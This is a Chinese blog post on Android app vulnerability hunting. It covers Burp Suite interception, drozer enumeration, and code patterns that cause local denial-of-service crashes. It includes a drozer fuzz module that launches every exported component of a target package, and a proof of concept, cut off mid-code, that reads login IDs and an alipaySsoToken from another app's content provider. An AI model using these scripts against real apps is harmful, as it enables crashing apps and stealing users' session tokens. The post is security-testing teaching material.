<!DOCTYPE html>





<html class="theme-next muse use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="generator" content="Hexo 3.7.1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.3.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    save_scroll: false,
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="移动安全知识总结前言之前自学了安卓的漏洞挖掘知识，还在wsrc、bilisrc、asrc等提交了安卓app方面的安全漏洞，一直没有做笔记，现在就来全面地总结一次。 用burpsuite实现app抓包点击Proxy——&amp;gt;Options里的add  输入模拟器的ip和端口  接着就是配置手机端，首先导出Burpsuite的CA证书。 点击import/export CA certificate，">
<meta property="og:type" content="article">
<meta property="og:title" content="移动安全知识学习总结">
<meta property="og:url" content="http://GD.com/2019/08/15/android/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="移动安全知识总结前言之前自学了安卓的漏洞挖掘知识，还在wsrc、bilisrc、asrc等提交了安卓app方面的安全漏洞，一直没有做笔记，现在就来全面地总结一次。 用burpsuite实现app抓包点击Proxy——&amp;gt;Options里的add  输入模拟器的ip和端口  接着就是配置手机端，首先导出Burpsuite的CA证书。 点击import/export CA certificate，">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565690472747.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565690539962.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565690686493.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565690807873.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565691159178.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565691272994.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565695708390.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565703734443.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565703870788.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565704961819.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565705075557.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565705210606.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565705458665.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565712145149.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565712177039.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565712309814.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565712740640.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565712896343.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565713060560.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565713199645.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565713745004.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565756653747.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565770915799.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565770971436.png">
<meta property="og:image" content="http://gd.com/2019/08/15/android/1565780462945.png">
<meta property="og:updated_time" content="2019-08-15T02:57:38.701Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="移动安全知识学习总结">
<meta name="twitter:description" content="移动安全知识总结前言之前自学了安卓的漏洞挖掘知识，还在wsrc、bilisrc、asrc等提交了安卓app方面的安全漏洞，一直没有做笔记，现在就来全面地总结一次。 用burpsuite实现app抓包点击Proxy——&amp;gt;Options里的add  输入模拟器的ip和端口  接着就是配置手机端，首先导出Burpsuite的CA证书。 点击import/export CA certificate，">
<meta name="twitter:image" content="http://gd.com/2019/08/15/android/1565690472747.png">
  <link rel="canonical" href="http://GD.com/2019/08/15/android/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>移动安全知识学习总结 | Hexo</title>
  








  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  <div class="container sidebar-position-left">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content page-post-detail">
            

  <div id="posts" class="posts-expand">
    

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://GD.com/2019/08/15/android/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="GD">
      <meta itemprop="description" content="a GOOD pwner">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">移动安全知识学习总结

            
          </h1>
        

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2019-08-15 00:31:01 / 修改时间：10:57:38" itemprop="dateCreated datePublished" datetime="2019-08-15T00:31:01+08:00">2019-08-15</time>
            </span>
          
            

            
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="移动安全知识总结"><a href="#移动安全知识总结" class="headerlink" title="移动安全知识总结"></a>移动安全知识总结</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>之前自学了安卓的漏洞挖掘知识，还在wsrc、bilisrc、asrc等提交了安卓app方面的安全漏洞，一直没有做笔记，现在就来全面地总结一次。</p>
<h2 id="用burpsuite实现app抓包"><a href="#用burpsuite实现app抓包" class="headerlink" title="用burpsuite实现app抓包"></a>用burpsuite实现app抓包</h2><p>点击Proxy——&gt;Options里的add</p>
<p><img src="/2019/08/15/android/1565690472747.png" alt="1565690472747"></p>
<p>输入模拟器的ip和端口</p>
<p><img src="/2019/08/15/android/1565690539962.png" alt="1565690539962"></p>
<p>接着就是配置手机端，首先导出Burpsuite的CA证书。</p>
<p>点击import/export CA certificate，</p>
<p><img src="/2019/08/15/android/1565690686493.png" alt="1565690686493"></p>
<p>选择第一个选项，然后重命名为xxx.cer,保存在一个合适的文件夹</p>
<p><img src="/2019/08/15/android/1565690807873.png" alt="1565690807873"></p>
<p>接着在安卓端的  设置–&gt;安全–&gt;从SD卡安装  把证书导进安卓端</p>
<p><img src="/2019/08/15/android/1565691159178.png" alt="1565691159178"></p>
<p>最后在网络设置上刚才在burpsuite输入的代理就可以进行抓包啦</p>
<p><img src="/2019/08/15/android/1565691272994.png" alt="1565691272994"></p>
<p>附上一张我在微博src挖到逻辑漏洞的图</p>
<p><img src="/2019/08/15/android/1565695708390.png" alt="1565695708390"></p>
<h2 id="用drozer进行app的漏洞挖掘"><a href="#用drozer进行app的漏洞挖掘" class="headerlink" title="用drozer进行app的漏洞挖掘"></a>用drozer进行app的漏洞挖掘</h2><p>drozer真的是个测安卓的神器，其最大的特点就是模块化，可以自行编写测试模块。安卓教程就不多讲，大家可以在网上搜索教程。</p>
<p>1、在PC上使用adb进行端口转发，转发到Drozer使用的端口31415</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb forward tcp:31415 tcp:31415</span><br></pre></td></tr></table></figure>
<p>2、在Android设备上开启Drozer Agent</p>
<p><img src="/2019/08/15/android/1565703734443.png" alt="1565703734443"></p>
<p>3、在PC上开启Drozer console</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">drozer console connect</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565703870788.png" alt="1565703870788"></p>
<h2 id="测试用到的各种命令"><a href="#测试用到的各种命令" class="headerlink" title="测试用到的各种命令"></a>测试用到的各种命令</h2><p>这里用官方提供的app做测试</p>
<h3 id="获取包名"><a href="#获取包名" class="headerlink" title="获取包名"></a>获取包名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.package.list -f sieve</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565704961819.png" alt="1565704961819"></p>
<h3 id="获取应用的基本信息"><a href="#获取应用的基本信息" class="headerlink" title="获取应用的基本信息"></a>获取应用的基本信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.package.info -a com.mwr.example.sieve</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565705075557.png" alt="1565705075557"></p>
<h3 id="确定攻击面"><a href="#确定攻击面" class="headerlink" title="确定攻击面"></a>确定攻击面</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.package.attacksurface com.mwr.example.sieve</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565705210606.png" alt="1565705210606"></p>
<p>由这可以看出3个activity、两个content providers和两个services暴露，可能存在漏洞。</p>
<h3 id="Activity"><a href="#Activity" class="headerlink" title="Activity"></a>Activity</h3><p>（1）获取activity信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.activity.info -a com.mwr.example.sieve</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565705458665.png" alt="1565705458665"></p>
<p>这里显示的是具体activity的名称，当我们反编译的时候搜索该名称就能找到漏洞代码。</p>
<p>（2）启动activity</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.activity.start --component com.mwr.example.sieve</span><br></pre></td></tr></table></figure>
<p>这条命令后面要加上具体的activity名称，当我们输入命令启动activity的时候，如果app崩溃了，就存在本地拒绝服务漏洞，如果启动的是我们不能访问的页面，该app就存在权限提升漏洞。</p>
<h4 id="更多具体的命令请参考下面这篇文章"><a href="#更多具体的命令请参考下面这篇文章" class="headerlink" title="更多具体的命令请参考下面这篇文章"></a>更多具体的命令请参考下面这篇文章</h4><p><a href="https://www.cnblogs.com/goodhacker/p/3906180.html" target="_blank" rel="noopener">https://www.cnblogs.com/goodhacker/p/3906180.html</a></p>
<h2 id="安卓的本地拒绝服务漏洞"><a href="#安卓的本地拒绝服务漏洞" class="headerlink" title="安卓的本地拒绝服务漏洞"></a>安卓的本地拒绝服务漏洞</h2><p>下面要讲的一中漏洞既普遍又通用，即安卓的本地拒绝服务。通用型本地拒绝服务漏洞，主要源于攻击者向Intent中传入其自定义的序列化类对象，当调用组件收到此Extra序列化类对象时，无法找到此序列化类对象的类定义，因此发生类未定义的异常而导致应用崩溃。<br>本地拒绝服务漏洞不仅可以导致安全防护等应用的防护功能被绕过或失效（如杀毒应用、安全卫士、防盗锁屏等），而且也可被竞争方应用利用来攻击，使得自己的应用崩溃，造成不同程度的经济利益损失。</p>
<p>1)  NullPointerException异常导致的拒绝服务，源于程序没有对getAction()等获取到的数据进行空指针判断，从而导致空指针异常而导致应用崩溃；</p>
<p>代码片段：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Intent i = new Intent();</span><br><span class="line">if (i.getAction().equals(&quot;TestForNullPointerException&quot;)) &#123;</span><br><span class="line">    Log.d(&quot;TAG&quot;, &quot;Test for Android Refuse Service Bug&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>2)  ClassCastException异常导致的拒绝服务, 源于程序没有对getSerializableExtra()等获取到的数据进行类型判断而进行强制类型转换，从而导致类型转换异常而导致应用崩溃；</p>
<p>代码片段：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Intent i = getIntent();</span><br><span class="line">String test = (String)i.getSerializableExtra(&quot;serializable_key&quot;);</span><br></pre></td></tr></table></figure>
<p>3)  IndexOutOfBoundsException异常导致的拒绝服务，源于程序没有对getIntegerArrayListExtra()等获取到的数据数组元素大小的判断，从而导致数组访问越界而导致应用崩溃；</p>
<p>代码片段：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Intent intent = getIntent();</span><br><span class="line">ArrayList&amp;lt;Integer&amp;gt; intArray = intent.getIntegerArrayListExtra(&quot;user_id&quot;);</span><br><span class="line">if (intArray != null) &#123;</span><br><span class="line">    for (int i = 0; i &amp;lt; USER_NUM; i++) &#123;</span><br><span class="line">        intArray.get(i);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="app漏洞测试步骤"><a href="#app漏洞测试步骤" class="headerlink" title="app漏洞测试步骤"></a>app漏洞测试步骤</h2><p>1、列出包含xxx字样的包名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.package.list -f xxx</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565712145149.png" alt="1565712145149"></p>
<p>2、查看攻击面</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.package.attacksurface 包名</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565712177039.png" alt="1565712177039"></p>
<p>3、查看暴露的activity</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run app.activity.info -a 包名</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565712309814.png" alt="1565712309814"></p>
<p>4、接下来就是用apktool反汇编在AndroidManifest.xml中找activity的详细信息</p>
<p>apktool反汇编命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apktool d xxx.apk -o outdir</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565712740640.png" alt="1565712740640"></p>
<p>查看所在的文件夹</p>
<p><img src="/2019/08/15/android/1565712896343.png" alt="1565712896343"></p>
<p>5、接着就是将apk反编译成java代码，由于方便，这里我常用的工具是 安卓逆向助手，当然jeb等工具也不错，但是正版的太贵了。。</p>
<p><img src="/2019/08/15/android/1565713060560.png" alt="1565713060560"></p>
<p>这里直接用jd-gui看第一个jar包，然后直接审oncreate函数，看看其有没有本地拒绝服务和权限提升等漏洞。</p>
<p><img src="/2019/08/15/android/1565713199645.png" alt="1565713199645"></p>
<p>6、也可以用jad工具把jar包反编译成java文件，然后用FileLocator Pro查找java</p>
<p>文件中有无漏洞代码，这里也可以用来查找动态注册的broadcast receivers</p>
<p>jad 反编译命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jad -o -r -sjava -dsrc com/**/*.class</span><br></pre></td></tr></table></figure>
<p> 此命令作用是把com文件夹及其子目录下所有的class反编译  </p>
<p>查找保护文本：</p>
<p><img src="/2019/08/15/android/1565713745004.png" alt="1565713745004"></p>
<h3 id="对activity进行fuzz自动化测试本地拒绝服务"><a href="#对activity进行fuzz自动化测试本地拒绝服务" class="headerlink" title="对activity进行fuzz自动化测试本地拒绝服务"></a>对activity进行fuzz自动化测试本地拒绝服务</h3><p>前面说过drozer最大的特点就是模块化，上面的步骤手动测太麻烦，我们可以自己编写或找个脚本自动帮我们测试。下面是我从网上找的脚本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line">from drozer import android</span><br><span class="line">from drozer.modules import common, Module</span><br><span class="line"> </span><br><span class="line">class Deny(Module, common.Filters, common.PackageManager):</span><br><span class="line"> </span><br><span class="line">    name = &quot;find NullPointerException&quot;</span><br><span class="line">    description = &quot;.&quot;</span><br><span class="line">    examples = &quot;&quot;&quot;</span><br><span class="line">    dz&gt; run app.package.deny com.android.browser</span><br><span class="line">    6 activities exported</span><br><span class="line">    4 broadcast receivers exported</span><br><span class="line">    1 content providers exported</span><br><span class="line">    0 services exported&quot;&quot;&quot;</span><br><span class="line">    author = &quot;ydalien&quot;</span><br><span class="line">    date = &quot;2017-01-02&quot;</span><br><span class="line">    license = &quot;BSD (3 clause)&quot;</span><br><span class="line">    path = [&quot;exp&quot;, &quot;fuzz&quot;]</span><br><span class="line">    permissions = [&quot;com.mwr.dz.permissions.GET_CONTEXT&quot;]</span><br><span class="line"> </span><br><span class="line">    def add_arguments(self, parser):</span><br><span class="line">        parser.add_argument(&quot;package&quot;, help=&quot;the identifier of the package to inspect&quot;)</span><br><span class="line"> </span><br><span class="line">    def attack(self,component,package,flags):</span><br><span class="line">        act=None</span><br><span class="line">        cat=None</span><br><span class="line">        data=None</span><br><span class="line">        comp=(package,component.name)</span><br><span class="line">        extr=None</span><br><span class="line">        flgs=None</span><br><span class="line"> </span><br><span class="line">        if(flags==&apos;activity&apos;):</span><br><span class="line">            flgs =[&apos;ACTIVITY_NEW_TASK&apos;]</span><br><span class="line"> </span><br><span class="line">        intent = android.Intent(action=act,component=comp,category=cat,data_uri=None, extras=extr, flags=flgs, mimetype=None)</span><br><span class="line"> </span><br><span class="line">        if intent.isValid():</span><br><span class="line">            if(flags==&apos;activity&apos;):</span><br><span class="line">                self.getContext().startActivity(intent.buildIn(self))</span><br><span class="line">            if(flags==&apos;service&apos;):</span><br><span class="line">                self.getContext().startService(intent.buildIn(self))</span><br><span class="line">            if(flags == &apos;receiver&apos;):</span><br><span class="line">                self.getContext().sendBroadcast(intent.buildIn(self))</span><br><span class="line">        else:</span><br><span class="line">            self.stderr.write(&quot;[-] Invalid Intent!\n&quot;)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">    def execute(self, arguments):</span><br><span class="line">        if arguments.package != None:</span><br><span class="line">            package = self.packageManager().getPackageInfo(arguments.package, common.PackageManager.GET_ACTIVITIES | common.PackageManager.GET_RECEIVERS | common.PackageManager.GET_PROVIDERS | common.PackageManager.GET_SERVICES)</span><br><span class="line">            application = package.applicationInfo</span><br><span class="line"> </span><br><span class="line">            activities = self.match_filter(package.activities, &apos;exported&apos;, True)</span><br><span class="line">            receivers = self.match_filter(package.receivers, &apos;exported&apos;, True)</span><br><span class="line">            providers = self.match_filter(package.providers, &apos;exported&apos;, True)</span><br><span class="line">            services = self.match_filter(package.services, &apos;exported&apos;, True)</span><br><span class="line">            </span><br><span class="line">            self.stdout.write(&quot;Attack Surface:\n&quot;)</span><br><span class="line">            self.stdout.write(&quot;  %d activities exported\n&quot; % len(activities))</span><br><span class="line">            self.stdout.write(&quot;  %d broadcast receivers exported\n&quot; % len(receivers))</span><br><span class="line">            self.stdout.write(&quot;  %d content providers exported\n&quot; % len(providers))</span><br><span class="line">            self.stdout.write(&quot;  %d services exported\n&quot; % len(services))</span><br><span class="line"> </span><br><span class="line">            if (application.flags &amp; application.FLAG_DEBUGGABLE) != 0:</span><br><span class="line">                self.stdout.write(&quot;    is debuggable\n&quot;)</span><br><span class="line"> </span><br><span class="line">            if package.sharedUserId != None:</span><br><span class="line">                self.stdout.write(&quot;    Shared UID (%s)\n&quot; % package.sharedUserId)</span><br><span class="line"> </span><br><span class="line">            actions=[activities,receivers,services]</span><br><span class="line">            action_str=[&apos;activity&apos;,&apos;receiver&apos;,&apos;service&apos;]</span><br><span class="line">            i=-1</span><br><span class="line">            try:</span><br><span class="line">                for action in actions:</span><br><span class="line">                    i+=1</span><br><span class="line">                    if len(action) &gt; 0:</span><br><span class="line">                        for tmp in action:</span><br><span class="line">                            try:</span><br><span class="line">                                if len(tmp.name) &gt; 0:</span><br><span class="line">                                    self.stdout.write(&quot; [+]%s name:%s\n&quot; % (action_str[i],tmp.name))</span><br><span class="line">                                    self.attack(component=tmp, package=arguments.package, flags=action_str[i])</span><br><span class="line">                            except Exception, e:</span><br><span class="line">                                self.stdout.write(&quot; error--&gt;%s name:%s\n&quot; % (action_str,tmp.name))</span><br><span class="line">                                self.stdout.write(&quot; errorcontent:%s\n&quot; % e)</span><br><span class="line">                                continue</span><br><span class="line">            except:</span><br><span class="line">                self.stdout.write(&quot; error&quot;)</span><br><span class="line">        else:</span><br><span class="line">            self.stdout.write(&quot;No package specified\n&quot;)</span><br></pre></td></tr></table></figure>
<p><a href="http://www.droidsec.cn/tag/drozer/" target="_blank" rel="noopener">drozer</a> 通过Module类的metadata来配置和管理每个模块,因此模块编写时需要包含以下 metadata信息:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">name          模块的名称</span><br><span class="line">description   模块的功能描述 </span><br><span class="line">examples      模块的使用示例</span><br><span class="line">author        作者</span><br><span class="line">date          日期</span><br><span class="line">license       许可</span><br><span class="line">path          描述模块命令空间</span><br></pre></td></tr></table></figure>
<p>这些信息中比较重要的就是path变量，它描述了模块在drozer namespace中的路径，结合对应的classname可以唯一确定drozer中的模块。</p>
<p>例如上面脚本中的path = [“exp”, “fuzz”] 我们只要运行 <code>run exp.fuzz.deny</code>加上脚本需要的参数（这里是包名）就能运行脚本。</p>
<p>drozer模块安装有两种方法，我们只讲其中一种，在repository中按照python包管理的方法新建目录结构，将python文件放入相应目录中。我们必须先在本地创建一个drozer 的repository目录，可以直接在drozer console中通过命令创建：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dz&gt; module repository create [/path/to/repository]</span><br></pre></td></tr></table></figure>
<p>创建好本地repository后就可以安装自己的模块了，按照python包管理的方式，在本地repository目录下创建目录exp,新建<strong>int</strong>.py空白文件，然后将Python模块源码放入exp目录即可。例如将fuzz.py放入exp目录下</p>
<p><img src="/2019/08/15/android/1565756653747.png" alt="1565756653747"></p>
<p>现在模块安装已经完成，可以开始测试了，首先开始运行前，我们要用logcat命令 <code>logcat | grep java.lang.RuntimeException</code>‘查看崩溃的原因具体是由哪个activity造成的，接着就可以run起来啦</p>
<p><img src="/2019/08/15/android/1565770915799.png" alt="1565770915799"></p>
<p><img src="/2019/08/15/android/1565770971436.png" alt="1565770971436"></p>
<p>由上图可看出该app因为空指针而导致程序崩溃，然后就可以反编译查看对应的漏洞代码，接着写poc</p>
<p>附上我常用的poc和我在src提交的洞:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">public class MainActivity extends Activity &#123;</span><br><span class="line">	</span><br><span class="line">	protected void onCreate(Bundle savedInstanceState)&#123;</span><br><span class="line">		super.onCreate(savedInstanceState);</span><br><span class="line">		setContentView(R.layout.activity_main);</span><br><span class="line">		Button button =(Button) findViewById(R.id.button);</span><br><span class="line">	button.setOnClickListener(new View.OnClickListener() &#123;</span><br><span class="line">		</span><br><span class="line">		@Override</span><br><span class="line">		public void onClick(View v) &#123;</span><br><span class="line">			/*</span><br><span class="line">			Uri uri=Uri.parse(&quot;content://com.alipay.ali.authlogin/aliuser_sdk_sso&quot;);</span><br><span class="line">			Cursor cursor=getContentResolver().query(uri, null, null, null, null);</span><br><span class="line">			if(cursor!=null)&#123;</span><br><span class="line">				String id=cursor.getString(cursor.getColumnIndex(&quot;loginId&quot;));</span><br><span class="line">				String img=cursor.getString(cursor.getColumnIndex(&quot;headImg&quot;));</span><br><span class="line">				String token=cursor.getString(cursor.getColumnIndex(&quot;alipaySsoToken&quot;));</span><br><span class="line">				System.out.println(id);</span><br><span class="line">				